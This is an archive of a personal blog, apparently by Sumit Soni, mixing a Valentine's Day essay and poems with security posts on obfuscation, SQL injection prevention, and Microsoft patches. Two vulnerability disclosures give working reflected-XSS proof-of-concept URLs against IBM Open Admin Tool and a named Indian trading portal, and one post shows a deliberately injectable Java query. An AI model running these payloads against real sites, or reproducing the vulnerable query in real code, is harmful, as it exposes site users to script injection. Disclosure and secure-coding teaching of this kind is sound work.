<p>voidroot, by Sumit Soni</p>
<p><strong>Valentine Day: Not about love, it's all about Courage</strong><br>Published 14 February 2013</p>
<p><img alt="valentine" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKEwNRnsPyOq3CCj57N0bLOwhgSz2SMTjnq9I2SwNrJ0IbZWMN3mpzH8DY5iwAzcWQLxTUEhT3LlsTGXztEj7d-P6erekpLeztUr6xsG6QD1t46It25eASpZ2fZzm9uZeY0RBhB8KyKSY/?imgmax=800">I never understood why Valentine's Day has been associated with love, when the acts of Saint Valentine were courageous and charismatic (at least once in his lifetime). To prove my point I searched historical documents and found the following points.</p> <p><strong><font size="3">Courage of Saint Valentine:</font></strong> “Saint Valentine was imprisoned for performing weddings for soldiers who were forbidden to marry and for ministering to Christians”. Going against the Roman emperor takes courage. What happened to those soldiers after marriage is unknown; perhaps they were punished, or maybe they absconded from Rome, but the priest paid the price. Note that this is not about helping couples who were in love but about helping people start their families (love does not need marriage to be proved).
</p> <p><strong><font size="3">Charisma of Saint Valentine:</font></strong> “He is said to have healed the daughter of his jailer Asterius when he was imprisoned”. Legend states that before his execution he wrote "from your Valentine" (the form of expression everyone still writes in their letters) as a farewell to her. I don't see any romantic love between these two, as their ages are not known, and a healer always gets a lot of respect from people.</p> <p><strong><font size="3">Heart symbol for Valentine:</font></strong> I became curious about how the heart came into the picture, and voila! I found the answer: Saint Valentine is said to have cut hearts from parchment, giving them to the soldiers (note: not to the girl or the couple but to the soldiers, maybe as a symbol of his blessings).</p> <p><strong><font size="3">What about 14th Feb:</font></strong> Saint Valentine was buried on the Via Flaminia on February 14. In Ancient Rome, Lupercalia, observed February 13–15, was an archaic rite connected to fertility. Lupercalia was a festival local to the city of Rome.
The more general Festival of Juno Februa, meaning "Juno the purifier" or "the chaste Juno", was celebrated on February 13–14.</p> <p>Note: The celebration of Saint Valentine did not have any romantic connotations until Chaucer's poetry about "Valentines" in the 14th century.</p> <p><strong><font size="3">Valentine's letters:</font></strong> In the Middle Ages, men drew the names of girls at random to couple with them; around 1600 this was replaced with a religious custom of girls drawing the names of apostles from the altar.</p> <p><strong><font size="3">So why did Valentine's Day become so famous:</font></strong> That is very difficult to answer, but it seems it was made famous by the poet Chaucer in the following poem, “Parlement of Foules” (it has almost 700 lines):</p> <p><i>For this was on seynt Volantynys day</i><br><i>Whan euery bryd comyth there to chese his make</i>.</p> <p><font color="#00ff00">["For this was on Saint Valentine's Day, when every bird cometh there to choose his mate."]</font></p> <p>But here is the catch: this poem was written to honor the first anniversary of the engagement of King Richard II of England to Anne of Bohemia. A treaty providing for a marriage was signed on May 2, 1381, and mid-February is an unlikely time for birds to be mating in England.</p> <p><strong><font size="3">So what should one do:</font></strong> OK, I give up now; history is very confusing, and we celebrate many rituals for the wrong reasons too. We need a special day for everything due to social, economic and marketing reasons, and if some famous or powerful person declares a day special, people start believing in it. So we have a day dedicated to love: if you believe in it, celebrate it; if you don't, then enjoy life and dedicate any other day (maybe every day) to your dear and loved ones.
– Enjoy</p> <p><font color="#00ff00"><i>Hayle Bishop Valentine whose day this is</i><br><i>All the Ayre is thy Diocese</i><br><i>And all the chirping Queristers</i><br><i>And other birds ar thy parishioners</i><br><i>Thou marryest every yeare</i><br><i>The Lyrick Lark, and the graue whispering Doue,</i><br><i>The Sparrow that neglects his life for loue,</i><br><i>The houshold bird with the redd stomacher</i><br><i>Thou makst the Blackbird speede as soone,</i><br><i>As doth the Goldfinch, or the Halcyon</i><br><i>The Husband Cock lookes out and soone is spedd</i><br><i>And meets his wife, which brings her feather-bed.</i><br><i>This day more cheerfully than ever shine</i><br><i>This day which might inflame thy selfe old Valentine.</i></font></p> <p><font color="#00ff00"><i>—John Donne, </i><cite>Epithalamion Vpon Frederick Count Palatine and the Lady Elizabeth marryed on St. Valentines day</cite></font></p> <p><cite>Reference: Various sources on the internet, especially Wikipedia</cite></p>
<p><strong>Pathar ka hraday (heart of stone)</strong><br>Published 3 January 2013</p>
<p>I sit holding a heart of stone.<br>I sit surrounded by my own shadows.<br>Don't search, don't try to find out<br>how I am, where I am, what I have drunk as I sit here.<br>A heart of stone ....................</p>
<p>I give no one the right to ask; I trust no one.<br>Why I did it, how I did it, what I have done as I sit here.<br>Explain nothing to me, tell me nothing, I know it all;<br>I am not the naive one, I sit here having understood everything.</p>
<p><strong>Mulakat nahi karta</strong><br>Published 26 December 2012</p>
<p>The complaint is that he never meets.</p> <p>He smiles, but never talks.</p> <p>He keeps his words like pearls;</p> <p>he is a miser, he never spends them.</p> <p>He never heeds what I say, just like that;</p> <p>absorbed in himself, he pays no attention.</p> <p>He knows every note, recognizes every art,</p> <p>yet he is somehow incomplete; he never finishes any work.</p>
<p><strong>Obfuscation methods</strong><br>Published 6 October 2012</p>
<p>While I was scrolling through my old mails in search of a financial document, I found an interesting doc I was working on a long time ago and, for some unknown reason, was not able to continue. Here I am posting that unfinished work. I will try to cover the topics in detail in future.</p> <p><strong><u>Obfuscation</u></strong></p> <p>To totally obscure with non-germane information in a verbose manner, with the intent to provide a non-answer, and provide total befuddlement.</p> <p>“Any hacker worth his salt is an artist in obfuscation”.</p> <p>In network security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems.</p> <p><b><u>Encryption vs Obfuscation</u></b></p> <p>Obfuscation<br>Obfuscation, in general, describes a practice that is used to intentionally make something more difficult to understand.
In a programming context, it means making code harder to understand or read, generally for privacy or security purposes. A tool called an obfuscator is sometimes used to convert a straightforward program into one that works the same way but is much harder to understand.</p> <p>Encryption<br>The manipulation of data to prevent accurate interpretation by all but those for whom the data is intended. Financial institutions use encryption to increase the security of data transmitted via the Internet.</p> <p><strong><u>Methods of obfuscation</u></strong></p> <p><font color="#4bacc6">Recreational obfuscation</font></p> <p>There are many varieties of interesting obfuscations, ranging from simple keyword substitution to the use or non-use of whitespace to create artistic effects.</p> <p><font color="#4bacc6">Obfuscation by code morphing</font></p> <p>This is achieved by completely replacing a section of the compiled code with an entirely new block that expects the same machine state when it begins execution as the previous section, and will leave the same machine state after execution as the original. However, a number of additional operations will be completed, as well as some operations with an equivalent effect.</p> <p><font color="#4bacc6">Obfuscation in malicious software</font></p> <p>Spammers frequently use obfuscated JavaScript or HTML code in spam messages. The obfuscated message, when displayed by an HTML-capable e-mail client, appears as a reasonably normal message—albeit with obnoxious JavaScript behaviors such as spawning pop-up windows. However, when the source is viewed, the obfuscations make it far more difficult for investigators to discern where the links go or what the JavaScript code does.</p> <p><font color="#4bacc6">Trail obfuscation</font></p> <p>The purpose of trail obfuscation is to confuse, disorientate and divert the forensic examination process.
Trail obfuscation covers a variety of techniques and tools that include “log cleaners, spoofing, misinformation, backbone hopping, zombied accounts, trojan command”.</p> <p><strong><u>Advantages of obfuscation</u></strong></p> <p><font color="#4bacc6">Intellectual property protection</font></p> <p><font color="#4bacc6">Reduced security exposure</font></p> <p><font color="#4bacc6">Size reduction</font></p> <p><font color="#4bacc6">Library linking</font></p> <p><u><strong>Disadvantages of obfuscation</strong></u></p> <p><font color="#4bacc6">When used alone</font></p> <p>At best, obfuscation merely makes it time-consuming, but not impossible, to reverse engineer a program. When security is important, measures other than obfuscation should be used.</p> <p><font color="#4bacc6">Debugging</font></p> <p>Obfuscated code is extremely difficult to debug. Variable names will no longer make sense, and the structure of the code itself will likely be modified beyond recognition. This fact generally forces developers to maintain two builds:</p> <p><font color="#4bacc6">Portability</font></p> <p>Obfuscated code often depends on the particular characteristics of the platform and compiler, making it difficult to manage if either changes.</p> <p><font color="#4bacc6">Obfuscation for evasion</font></p> <p>Protection provided by security devices can be bypassed by obfuscating the exploit/shellcode.
Some of the known methods are:</p> <ul> <li>Encoding</li> <li>Directory traversing</li> <li>Null characters</li> <li>Spaces</li></ul>
<p><strong>Writing Security Story</strong><br>Published 19 September 2012</p>
<p>A Security Story is an artifact that anyone (developer, manager, business owner, user, etc.) can read and feel assured that their security concerns are addressed. It is a collaborative effort that highlights how the implementation, application design, service infrastructure, organization processes, and the business environment itself protect what’s important to the business.</p> <p>There is no fixed format or content for a security story, as a security story should evolve over the life of an application. A story may contain text, images, diagrams, spreadsheets, links, and other formats.</p> <p>A security story can be written in many ways. Most commonly it starts by capturing the concerns of application stakeholders, including both application providers and application users, followed by listing the lifelines of the application. You need to create a strategy to defend each lifeline, build the specific defences, and include proof of these defences in the story. Security stories are not static; they have to change when conditions change.</p> <p>Reference: http://www.ruggedsoftware.org/</p>
<p><strong>What It Takes To Be Rugged</strong><br>Published 18 September 2012</p>
<p>Recently one of my friends asked if there is any good reference for incorporating security testing into agile development. Unfortunately we were not able to find any such reference, although the Rugged approach looks promising and also claims to support agile security testing of applications.
The ultimate goal of including security testing in the SDLC is to produce secure code.</p> <p>The Rugged approach doesn't focus only on finding vulnerabilities but tries to improve the overall capability of an organization to develop secure code. To achieve this goal an organization must establish a process to monitor upcoming threats. There should be a communication path so everyone can share all the security-relevant information about the application. A standard mechanism of defence should be used across the organization. Don't trust third-party components used in your product; establish guidelines for each component that detail the secure use of that library. Build applications that will be largely resistant to the threats of the future: for example, using strong input validation, in-application attack detection and safe interpreter use can eliminate many flaws forever. Defences should be continuously verified and monitored all the way through development and into production. Being Rugged means that you constantly patch and refactor your software development organization to eliminate the organizational bugs that are causing insecure code.</p> <p>Reference: http://www.ruggedsoftware.org/</p>
<p><strong>The Rugged Software Manifesto</strong><br>Published 3 September 2012</p>
<ul> <li>I am rugged and, more importantly, my code is rugged.</li> <li>I recognize that software has become a foundation of our modern world.</li> <li>I recognize the awesome responsibility that comes with this foundational role.</li> <li>I recognize that my code will be used in ways I cannot anticipate, in ways it was not designed, and for longer than it was ever intended.</li> <li>I recognize that my code will be attacked by talented and persistent adversaries who threaten our physical, economic, and national security.</li>
<li>I recognize these things - and I choose to be rugged.</li> <li>I am rugged because I refuse to be a source of vulnerability or weakness.</li> <li>I am rugged because I assure my code will support its mission.</li> <li>I am rugged because my code can face these challenges and persist in spite of them.</li> <li>I am rugged, not because it is easy, but because it is necessary and I am up for the challenge.</li></ul> <p>Reference: <a href="http://www.ruggedsoftware.org/">http://www.ruggedsoftware.org/</a></p>
<p><strong>Impacting Adversary ROI</strong><br>Published 30 August 2012</p>
<p>Recently I was looking at talks from RSA 2012. One talk which got my attention is "Adversary ROI: Why Spend $40B Developing It, When You Can Steal It for $1M". The two points I liked most are:</p> <p>1. The Adversary Doesn’t Care About Your ROI/ROSI.</p> <p>2. Whatever security measures you put in place should reduce the Adversary ROI.</p> <p>Let's look at the formula for adversary ROI:</p> <p><strong>Adversary ROI</strong> = (((Attack value (Value of Assets Compromised + Adversary Value of Operational Impact) - Cost of the Attack) x Probability of Success) / Cost of the Attack) - Deterrence Measures (% Chance of Getting Caught x Cost of Getting Caught)</p> <p>The most important factor in this ROI is the cost of the attack: if your security measures can increase the <strong>cost of attack</strong> (which most measures do) it will reduce the adversary ROI many fold. This is the area where most security vendors have focused their effort, along with reducing the probability of success. Advancements in attack tools and techniques reduce the attack cost and increase the probability of success, so white hats/defenders find themselves in a rat race to build countermeasures.
As best practice, multilayer security (IPS/IDS/firewall/antimalware) has to be implemented to affect these vectors of adversary ROI.</p> <p>Let's say that after applying all the measures an attacker is still able to penetrate your system. If you can be alerted and act (here your various monitoring systems play a great role, for example file/registry/process integrity monitoring systems, log inspection systems, etc.) before the adversary is able to steal or damage your assets, this will reduce the <strong>probability of success</strong>.</p> <p>What if your assets have been stolen or damaged before you were able to act? There is still hope in the form of your risk management policy and forensics, which can help in recovery and in catching your adversary. These two factors increase the <strong>chance of catching the hacker</strong>.</p> <p>Now there is one factor which you cannot control directly: the <strong>impact of getting caught</strong>. It depends a lot on the government/country rules and regulations and how they treat your adversary.</p> <p>While you can reduce the <strong>value of assets compromised</strong>, it’s not always possible and not advisable either, and you cannot control the <strong>Adversary Value of Operational Impact</strong>, as it depends on the type of adversary you are dealing with.</p> <p>One thing should be noted here: the factors affecting adversary ROI should be considered in totality, not in isolation.</p> <p>Reference:</p> <p><a href="http://365.rsaconference.com/servlet/JiveServlet/previewBody/3429-102-1-4545/GRC-202.pdf">http://365.rsaconference.com/servlet/JiveServlet/previewBody/3429-102-1-4545/GRC-202.pdf</a></p>
<p><strong>Security Related Quotes</strong><br>Published 30 August 2012</p>
<ul> <li>A risk requires a threat and a vulnerability that results in a negative consequence.</li>
<li>A Threat is an Actor with a Capability and a Motive.</li> <li>Casual Attacker power grows at the rate of Metasploit.</li> <li>PCI won’t stop a <em>determined attacker</em>, but it will at least stop a <em>casual attacker.</em></li> <li>PCI is better than <em>nothing</em> – it at least raises the bar.</li> <li>The organization doesn’t often profit from security investments.</li> <li>Attack surface is approaching infinity (which is not a real number).</li> <li>Risk Mitigated can be both subjective and objective.</li> <li>The Adversary Doesn’t Care About Your ROI/ROSI.</li> <li>The problem is that security is so complex that every topic has a huge amount of context associated with it.</li> <li>Don’t let your project’s definition of security be driven by the signatures in a tool, external compliance requirements, or what happens to be in a particular penetration tester’s or developer’s head.</li> <li>There are simply far too many ways to write insecure code.</li> <li>We don’t need to fix those vulns; we have a WAF - ROFL</li></ul>
<p><strong>Test Process Improvement manifesto</strong><br>Published 21 August 2012</p>
<p><strong>Flexibility</strong> over Detailed Processes</p> <p><strong>Best Practices</strong> over Templates</p> <p><strong>Deployment orientation</strong> over Process orientation</p> <p><strong>Reviews</strong> over Quality Assurance (departments)</p> <p><strong>Business driven</strong> over Model driven</p>
<p><strong>Manifesto for Agile Software Development</strong><br>Published 13 August 2012</p>
<p>We are uncovering better ways of developing software by doing it and helping others do it.
Through this work we have come to value:</p> <dl> <dd><b>Individuals and interactions</b> over processes and tools</dd> <dd><b>Working software</b> over comprehensive documentation</dd> <dd><b>Customer collaboration</b> over contract negotiation</dd> <dd><b>Responding to change</b> over following a plan</dd></dl> <p>That is, while there is value in the items on the right, we value the items on the left more.</p>
<p><strong>Parameterized Queries: Fix the SQL injection at the root</strong><br>Published 21 July 2012</p>
<p>SQL injection is the most common vulnerability found in web applications. Whenever I talk about its prevention, the most common answer is input validation, which is the most cost-effective and can be implemented without changing the code (using some third-party product like a WAF, IPS/IDS or proxy) or without changing the SQL statements, by implementing such functions in the web application itself. But this is trivial to bypass (we are living in a world where a hell of a lot of character encodings are supported) and it often leads to broken applications.</p> <p>In this article I will try to explore fixing the problem at its root. Modern applications are built using multi-tier architectures, and the most common architecture is the 3-tier architecture.</p> <p><strong>3-Tier Architecture:</strong> This involves three layers: the client layer, the server layer, and the business logic tier (also called the service tier or middle tier). In the client-server solution the client was handling the business logic, which makes the client “thick”. A thick client means that it requires heavy traffic with the server, thus making it difficult to use over slower network connections like the Internet and wireless.</p> <p>In the 3-tier architecture, the client handles only presentation logic.
This means that only a little communication is needed between the client and the middle tier, making the client “thin”. So a typical view would be <b>Client tier <---> Middle tier <---> Database tier</b>.</p> <p>Many developers believe that following secure coding practices for the middle tier only will prevent SQL injection, which is not always true, as we will see in a short while.</p> <p>Now let’s have a look at a typical SQL injection flaw.</p> <p><strong>Dynamic Queries:</strong> The following (Java) example would allow an attacker to inject code into the query that would be executed by the database. The unvalidated “userName” parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method of accessing databases is all too common. This is also known as a dynamic query.</p> <p>// Vulnerable: the user-supplied value becomes part of the SQL text itself.<br>String query = "SELECT EmployeeId FROM Employee WHERE Emp_name = '" + request.getParameter("userName") + "'";<br>Statement stmt = connection.createStatement();<br>ResultSet results = stmt.executeQuery(query);</p> <p>In the SQL community, to make an SQL statement injection-proof, the use of parameterized queries is highly recommended.</p> <p><b>Parameterized Queries:</b> They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.</p> <p>Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. For example, if an attacker were to enter the userName of blah' or '1'='1, the parameterized query would not be vulnerable and would instead look for an Emp_name which literally matched the entire string blah' or '1'='1.</p> <p>// Safe: the SQL text is fixed first; the value is bound to the ? placeholder afterwards.<br>String username = request.getParameter("userName");<br>String query = "SELECT EmployeeId FROM Employee WHERE Emp_name = ?";<br>PreparedStatement pstmt = connection.prepareStatement(query);<br>pstmt.setString(1, username);<br>ResultSet results = pstmt.executeQuery();</p> <p>Another benefit of using parameterized queries is performance enhancements; for details please check http://www.simple-talk.com/sql/t-sql-programming/performance-implications-of-parameterized-queries/</p> <p>Another method that can be used to make your database access SQL-injection-proof is to use stored procedures.</p> <p><b>Stored procedures:</b> They have the same effect as the use of prepared statements when implemented safely, i.e. stored procedures must not use any dynamic SQL statements. They require the developer to define the SQL code first, and then pass in the parameters after. The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application. Using this technique requires close interaction between database developers and middle-tier developers.</p> <p>// Safe only when the procedure itself contains no dynamic SQL.<br>String username = request.getParameter("userName");<br>CallableStatement cstmt = connection.prepareCall("{call getEmpId(?)}");<br>cstmt.setString(1, username);<br>ResultSet results = cstmt.executeQuery();</p> <p><strong>References:</strong><br>https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet<br>http://blog.simcrest.com/what-is-3-tier-architecture-and-why-do-you-need-it/<br>https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet<br>http://www.simple-talk.com/sql/t-sql-programming/performance-implications-of-parameterized-queries/</p>
<p><strong>SharePoint left naked for one month by HTML Sanitization Vulnerability - CVE-2012-1858</strong><br>Published 13 July 2012</p>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal">
On 10th July MS released a security patch to fix the
vulnerability in the toStaticHTML API. This API is found in Internet Explorer 8 and 9, SharePoint and Lync. It is used to sanitize HTML fragments from
dynamic and potentially malicious content.</div>
<div class="MsoNormal">
If an attacker is able to
break the filtering mechanism and pass malicious code through this function,
he/she may be able to perform HTML injection based attacks (i.e. XSS).</div>
<div class="MsoNormal">
Microsoft has issued several updates to address this
vulnerability.</div>
<div class="MsoNormal">
MS12-037 - <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-037">http://technet.microsoft.com/en-us/security/bulletin/ms12-037</a> Published: Tuesday, June 12, 2012</div>
<div class="MsoNormal">
MS12-039 - <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-039">http://technet.microsoft.com/en-us/security/bulletin/ms12-039</a>
Published: Tuesday, June 12, 2012</div>
<div class="MsoNormal">
Note that one month later MS released one more update for the
same vulnerability.</div>
<div class="MsoNormal">
MS12-050 - <a href="http://technet.microsoft.com/en-us/security/bulletin/MS12-050">http://technet.microsoft.com/en-us/security/bulletin/MS12-050</a>
Published: Tuesday, July 10, 2012</div>
<div class="MsoNormal">
Now it’s very interesting that MS released its fix for
IE and Lync on June 12 and for SharePoint it released its fix on July 10. So whoever knew that
this particular API is also used in SharePoint had a full month to
create an exploit and had a big window to exploit this vulnerability on SharePoint.</div>
<div class="MsoNormal">
I wonder what made MS do that. Wasn't that a zero day for SharePoint?</div>
</div>
<p><strong>XSS in IBM Open Admin Tool</strong><br>Published 19 August 2011</p>
<blockquote><p>“XSS in IBM Open Admin Tool (OAT_2.27_install_windows.exe)”</p></blockquote> <p>Product version: OAT v2.27</p> <p>Vendor informed: July 27, 2010</p> <p>Vendor fixed the vulnerability: March 2011</p> <p>Fixed version: OAT v2.72</p> <p>Product link: <a href="https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=swg-informixfpd&lang=en_US&S_PKG=dl&cp=UTF-8">https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=swg-informixfpd&lang=en_US&S_PKG=dl&cp=UTF-8</a></p> <p>Tested on Windows XP</p> <p>OpenAdmin Tool for IDS Cross Site Scripting Vulnerability</p> <p>OpenAdmin Tool is a PHP-based web browser administration tool for managing one or more Informix Dynamic Servers. The OpenAdmin Tool for IDS provides the ability to monitor and administer multiple IDS database server instances from a single location.</p> <p>An XSS vulnerability exists in its index page for the parameters named informixserver, host and port.
</p> <p>POC:</p> <p>http://server:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver=&lt;script&gt;alert("server")&lt;/script&gt;&host=&lt;script&gt;alert("host")&lt;/script&gt;&port=&lt;script&gt;alert("port")&lt;/script&gt;&username=&lt;script&gt;alert("username")&lt;/script&gt;&userpass=&lt;script&gt;alert("userpass")&lt;/script&gt;&idsprotocol=onsoctcp&conn_num</p> <p>Regards</p> <p>Sumit Kumar Soni</p> <p><a href="mailto:ssummit@gmail.com">ssummit@gmail.com</a></p>
<p><strong>Multiple XSS Vulnerabilities in Sharekhan trading Portal (https://strade.sharekhan.com)</strong><br>Published 20 July 2011</p>
<p><b>Vulnerability Description:</b></p><p>Sharekhan (an Indian stock trading portal) allows its users to trade in the stock market and also manage their DP account. Being in the finance domain it should be secure and vulnerability-free, but its online portal “<a href="https://strade.sharekhan.com/">https://strade.sharekhan.com/</a>” contains multiple XSS (cross-site scripting) vulnerabilities that can be used against the site's users for phishing and information gathering, and can be turned into financial losses for them. I have tried to contact Sharekhan but have not got any positive response yet, so I have reported these vulnerabilities to <a href="http://cert.in/">cert.in</a> for further action and coordination with the Sharekhan site administrator.</p><p>These are fairly simple to discover and exploit.
</p><p><b>Type of vulnerability: </b>Input validation (XSS) </p><p><b>Product:</b> Sharekhan trading Portal </p><p>POC: </p><p>(User login required) </p><p><a href="https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=">https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=</a><script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512 </p><p><a href="http://lh6.ggpht.com/-dGew-895GZw/TibyKWs-f3I/AAAAAAAACaM/uGG_QrYnsmQ/s1600-h/image%25255B2%25255D.png"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" alt="image" src="http://lh4.ggpht.com/-xMkmJH2Pn8s/TibyLBQVCTI/AAAAAAAACaQ/Ss-gKO88iMI/image_thumb.png?imgmax=800" border="0" height="101" width="230" /></a> </p><p>(User login is not required) </p><p><a href="https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan">https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan</a> pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&caller=https%253A%252F%<a href="http://252fstrade.sharekhan.com/">252Fstrade.sharekhan.com</a>%252Frmmweb%252Fadminpcs.sk%253F </p><p><a href="http://lh3.ggpht.com/-zc09c1mKZmU/TibyL6SNmMI/AAAAAAAACaU/Wbd7ITGykCw/s1600-h/image%25255B5%25255D.png"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" alt="image" src="http://lh3.ggpht.com/-Vj0HCWLrzKQ/TibyMgiWr4I/AAAAAAAACaY/WHbQy5NlEdc/image_thumb%25255B1%25255D.png?imgmax=800" border="0" height="100" width="230" /></a></p>Sumit 
Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-48068796134956263292010-12-19T21:44:00.001-08:002010-12-19T21:44:46.451-08:00Open popups in new windows in firefox<p>Did you ever face problems with popups when you wish them to open in a new tab instead of a new window? It's simple: in Firefox type about:config and change the value of the <br><b>browser.link.open_newwindow.restriction</b> parameter to <b>0</b>. Your problem will be solved.</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-54979304886787955262010-12-10T09:46:00.001-08:002010-12-10T09:46:14.821-08:00MSN Still Missing Twitter<p> </p> <p>I installed the latest Windows Live Messenger 2011, a great improvement over its ancestors. It is faster & has a pretty cool theme-based GUI. The biggest makeover/USP of this new toy is its seamless integration with various social networks like </p> <p><a href="http://lh3.ggpht.com/_KqURyIY5WSM/TQJnXXjLu5I/AAAAAAAACYs/Y37Nmk8uWUY/s1600-h/msnservices%5B2%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="msnservices" border="0" alt="msnservices" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQJnX8RZQyI/AAAAAAAACYw/2opAEuEm-yg/msnservices_thumb.jpg?imgmax=800" width="244" height="113"></a></p> <p>Facebook, LinkedIn etc. </p> <p>Although some articles claim that it also integrates Twitter, that turned out to be false; that's the only gem missing from MSN. I am looking forward to Microsoft providing Twitter integration as well, so I won't need to use my browser or a third-party plugin to stay on Twitter. 
</p> <p><a href="http://lh4.ggpht.com/_KqURyIY5WSM/TQJnYqhTJhI/AAAAAAAACY0/k6G0k7woqtg/s1600-h/msnservicetwitter%5B2%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="msnservicetwitter" border="0" alt="msnservicetwitter" src="http://lh5.ggpht.com/_KqURyIY5WSM/TQJnZS0N4YI/AAAAAAAACY4/T7_n8H7UBDc/msnservicetwitter_thumb.jpg?imgmax=800" width="244" height="108"></a></p> <p>Another service I wish to access through MSN is Orkut (a social networking site widely used in India), but Twitter is number one on my list, as I am used to Echofon (a Firefox plugin) that keeps me connected to Twitter all the time without opening an extra webpage & shows new tweets instantly.</p> <p>MSN keeps me updated on my Facebook updates & Hotmail; with Twitter my online social requirements would be fulfilled. I don't want to use any third-party tool/plugin for this purpose due to performance & security reasons. I hope Microsoft soon integrates Twitter & Orkut; let's keep our fingers crossed. </p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-62569308451930710202010-12-10T04:26:00.001-08:002010-12-10T04:26:23.852-08:00Oracle Database Firewall<p> <p align="center"><font size="4">Oracle Database Firewall</font> <p><a href="http://www.oracle.com/us/products/database/database-firewall-160528.html">http://www.oracle.com/us/products/database/database-firewall-160528.html</a> <p><b>Cost Effective Protection for Oracle and non-Oracle Databases</b><br>Oracle Database Firewall, part of Oracle's <a href="http://www.oracle.com/us/products/database/security/index.html">comprehensive portfolio of database security solutions</a>, is the first line of defense for both Oracle and non-Oracle databases. 
It monitors database activity on the network to help prevent unauthorized access, SQL injections, privilege or role escalation, and other external and internal attacks - all in real time. Based on innovative SQL grammar technology that can reduce millions of SQL statements into a small number of SQL characteristics, Oracle Database Firewall offers unmatched accuracy, scalability, and performance. Enforcement of positive (white lists) and negative (black lists) security models provides protection from threats without time-consuming and costly false positives. Oracle Database Firewall also enables organizations to address SOX, PCI, HIPAA/HITECH, and other regulatory requirements without changes to existing applications or databases, and to demonstrate compliance with over a hundred built-in customizable reports. <table border="0" cellspacing="5" cellpadding="0"> <tbody> <tr> <td valign="top"> <h4>Oracle Database Firewall Key Features</h4></td></tr> <tr> <td> <p><a href="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcVdbvZmI/AAAAAAAACYM/4L_wgUuQbtQ/s1600-h/clip_image001%5B3%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image001" border="0" alt="clip_image001" src="http://lh4.ggpht.com/_KqURyIY5WSM/TQIcWdzIZjI/AAAAAAAACYQ/nr6_EusWYgw/clip_image001_thumb.jpg?imgmax=800" width="244" height="6"></a></p></td></tr> <tr> <td valign="top" width="90"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/index-161576.html?ssSourceSiteId=otncn">Database Firewall for Security and Compliance</a></p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-whitelist-161577.html?ssSourceSiteId=otncn">White list, black list, exception list policies</a></p></td></tr> <tr> <td valign="top"> </td> <td 
valign="top"> <p>3-click security policies</p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-models-161579.html?ssSourceSiteId=otncn">Safe, scalable deployment models</a></p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-reports-161580.html?ssSourceSiteId=otncn">Flexible reporting and alerting</a></p></td></tr></tbody></table> <h4>Database Firewall for Security and Compliance</h4> <p>Traditional network firewalls are an established technology and play an important role in protecting data centers from unauthorized access from the outside. Data center attacks, however, have grown increasingly sophisticated, leveraging porous perimeters on the inside to launch attacks on the database itself. <p>Examining SQL traffic and enforcing security policies on the network has emerged as an important addition to the defense-in-depth security architecture. This is especially true in heterogeneous database environments where security controls cannot be enforced in the database itself. Oracle Database Firewall creates a defensive perimeter around databases, monitoring and enforcing normal application behavior, helping to prevent SQL injection attacks and attempts to access sensitive application data using unauthorized SQL commands. 
